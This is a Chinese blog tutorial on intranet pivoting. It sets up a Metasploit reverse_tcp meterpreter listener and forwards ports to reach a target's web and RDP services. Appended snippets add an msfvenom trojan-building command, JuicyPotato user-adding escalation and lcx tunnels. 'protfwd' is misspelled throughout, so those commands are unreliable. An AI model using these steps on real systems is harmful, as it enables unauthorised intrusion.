内网渗透-端口转发与映射

最新推荐文章于 2024-06-22 22:55:11 发布
最新推荐文章于 2024-06-22 22:55:11 发布
阅读量327 收藏 1
点赞数 2
分类专栏: 端口转发 渗透 文章标签: 渗透测试 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45427778/article/details/119778924
版权
本文介绍了内网渗透中的端口转发与端口映射技术。通过msf生成后门并设置参数,实现攻击主机与目标主机间的连接。端口映射示例中,展示了如何通过本地2020端口访问目标主机的80端口,而端口转发则演示了如何通过5555端口访问目标主机的3389端口。同时,还提供了查看和清除转发列表的方法。
摘要由CSDN通过智能技术生成

内网渗透之——端口转发与端口映射

首先在msf生成后门使用exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.115

set lport 12345

端口映射:

protfwd --help

通过访问本机的2020端口访问数据服务器的80端口

在攻击主机执行protfwd add -L 192.168.0.115 -l 2020 -p 80 -r 10.10.10.128

在攻击主机执行firefox http://192.168.0.115:2020来访问目标主机80端口

转发端口:

通过访问本机的5555端口来访问目标主机的3389端口

protfwd add -l 5555 -p 3389 -r 192.168.0.149

在攻击主机执行 rdesktop 127.0.0.1:5555连接目标主机

查看列表: protfwd list

清空列表: protfwd flush

monster^
关注
专栏目录
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 1740
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发端口映射等相关
内网渗透-Earthworm的简单使用(内网穿透工具)
lza20001103的博客
08-11 1866
内网渗透-Earthworm的简单使用(内网穿透工具)
内网渗透思路01之MeTasploit来实现端口转发端口映射
划水的小白白
03-06 568
小说明:攻击者拿下“ 2008服务器 ”,不能直接访问内网中的“ 数据服务器 ” 生成metasploit后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.115 lport=12345 -f exe >/var/www/html/ss.exe 将木马文件上传至受害者机器 攻击者Kali开启监听 use exploit/multi/handler set payload windows/meterpreter/.
干货|内网渗透端口转发&端口映射
热门推荐
anan的博客
11-09 5万+
端口转发 端口转发,有时被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络端口转发到另一个网络端口或从一个网络节点转发到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内网)上的一个端口。 简要说明:端口转发就是将一个端口,这个端口可以本地的端口也可以是访问到任意主机的端口,转发到任意一台可以访问的IP上...
内网渗透】全网最详细的端口转发教程
最新发布
TT小子的博客
06-22 2426
最近在真实环境测试和编写靶场实战教程时,总会遇到内网主机无法直接访问,需要通过转发端口、建立代理隧道等方式去访问,以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用。
内网穿透映射端口
qq1325928591的博客
12-07 399
内网穿透映射端口 很多小伙伴在拿下一台机器,尤其对于我这种菜鸟来说,连接一句话木马后,就不知道怎样进行下一步操作了,所以,这次这里拿靶机尝试做了一个内网的端口映射 拿到机器时候发现为普通用户权限 拿到机器时候whoami之后为普通用户权限的情况下,上传jucypotato尝试添加用户提权 net user 用户 用户密码 /add jucypotato.exe -p “net user administrators 被添加的用户” 尝试远程连接后各种操作均失败 利用公网IP进行端口监听 首先我们需要一个
内网渗透----端口转发技术
浅笑996的博客
12-06 2518
htran/lcx 1. 使用htran/lcx进行正向转发 本机执行以下命令,将操作机的8888端口转发至目标机器的7001端口 lcx.exe -tran 8888 192.168.0.136 7001 访问操作机的8888端口 2. 使用htran/lcx进行反向转发 操作机执行 lcx.exe -listen 8888 5656 需上传lcx至靶机,并执行 lcx.exe -slav...
聊聊端口映射和内网穿透
suswulongyuan的博客
06-13 1万+
今天又是说网络~~ 来聊聊端口映射和内网穿透趴~~ 专业词汇的理解 1.源地址:访问者 2.目标地址:被访问者 3.源地址转发: 比如你在家中,家中的电脑的内网ip地址为源地址,你的电脑需要上网,那么就需要将你的内网地址伪装成公网地址,这样在成功拨号之后,内网就可以连接到外网了。 4.端口映射和目标地址转发: 局域网内某个设备的端口映射到公网IP,这样外部就可以访问。外部可以 通s过公网IP和端口号,来访问内部的设备。 比如开放BT端口、迅雷端口、NAS端口,都要把他们映射出去,这样BT、迅雷连接到公网,
渗透测试6---神器nc,frp内网穿透,window下的netsh端口转发,window下的内网穿透工具lcx
初遇我ㄖ寸の热情呢?
04-14 8702
nc/netcat/ncat简史 nc是代理转发的神奇 nc被誉为网络安全界的瑞士军刀,端口扫描工具,也是一款安全工具,还能是一款监测工具,通过使用TCP或UDP协议的网络连接去读写数据 nc的版本非常乱,有很多版本。 传统版本:(有扫描功能,现代版本没有) netcat-traditional : Kali Linux默认的版本,命令为nc或netcat netcat-openbs...
lcx.exe32位和lcx64.exe位端口映射.rar
03-19
LCX的32位和64位版本均支持这种功能,可以将内网服务的端口映射到公网可访问的端口,使得外部用户能够通过这个映射端口与内网服务器建立连接。 `lcx64.exe`作为64位版本,除了基本的端口映射功能外,可能还包含更...
电脑教程内网渗透之内网穿透.rar
10-25
5. **端口转发**:通过路由器的配置,将外网请求转发到内网特定设备的端口。这需要对路由器的设置有一定的了解,包括静态端口映射和动态端口映射。 6. **DDNS(动态域名解析服务)**:结合NAT穿透,为动态IP的内网...
渗透测试之内网转发
qq_29864185的博客
07-01 227
内网转发 当我们获取到了网站的Webshell之后,如果我们想获取该主机的有关信息,我们可以将该主机的webshell换成MSF的shell。直接生成一个木马,然后在菜刀中执行该木马,我们就能接收到一个MSF类型的shell了。 如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。我们是不能直接和内网的主机通信的,所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。 内网转发 内网转发随想 内网穿透工具FRP的使用 ———————————————— 版..
端口转发1:通过MSF实现
da_chuan_chuan的博客
01-03 5710
文章目录前言一、生成MSF后门程序并上线二、使用portfwd实现端口转发1、端口转发前测试远程连接和数据库连接是否成功2、进行端口映射总结 前言 在内网渗透过程中,实现端口转发是十分重要的一步。如:我们要进行远程连接,但是它只允许内网主机连接;将内网访问的网站转发出来,实现外网可以访问。要解决这些情况我们都可以通过端口转发来解决,我们可以把内网端口转发到出网的端口上,也可以把端口转发到我们的 VPS主机上。下面以Windows2008服务器为目标服务器 ,以Ubantu为VPS主机。这里为了 方便假设我
红队隧道应用篇之MsfPortfwd端口转发(三)
xf555er的博客
12-08 1094
Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器, 例如不出网的内网主机, 前提是你要有一个此内网网段的能出网的主机的Meterpreter shell: 增加端口转发: 删除指定的端口转发: 查看端口转发列表: 清除所有的端口转发-: 监听的本地主机, 默认为127.0.0.1: 查看帮助: 监听的本地端口: 连接的目标端口: 连接的目标IP新增一个端口转发记录, 将本地的8080端口数据转发至内网主机的80端口, 也可以说成将内网主机的80端
20200503web渗透学习之内网渗透端口转发/映射portfwd
qq_45290991的博客
05-03 699
这几天51放假,但是在忙泰迪杯,选了C题目就是草呀(一种植物) 一、原理 原理层面大佬已经写得很好了:https://xie1997.blog.csdn.net/article/details/103528138?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&depth_1-utm_source=distribut
渗透测试内网渗透(四):端口转发
m0_74131821的博客
04-26 1964
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
内网基础-隧道技术、内网穿透(SSH隧道、Socket隧道、跨路由扫描)
dzqxwzoe的博客
05-20 1418
​环境搭建​​​SSH隧道​​​正向连接​​​反向隧道​​​sockets代理​​​MSF端口映射​​​Socket隧道​​​ssocks​​​反向代理​​​1.建立隧道​​​2.开启代理​​​正向代理​​​扫描内网​​​MSF跨路由扫描​​​简单收集信息​​​增加路由​​​MSF其他模块​​​推荐阅读​​。
渗透测试内网渗透(三):流量转发
m0_74131821的博客
04-25 1582
在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透
内网渗透-端口转发隧道技术
weixin_60329395的博客
08-02 2181
代理和隧道技术区别、代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现、隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系统。(封装协议)
Http加密隧道下的内网渗透端口转发与权限突破
- 端口转发,将目标内网的445、135、139或5985端口映射到本地机器上,实现远程命令执行。 - 文件传输,实现本地和目标机器之间的文件共享。 - 远程管理系统计划任务,以便执行特定操作(可能因135端口问题而受限...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值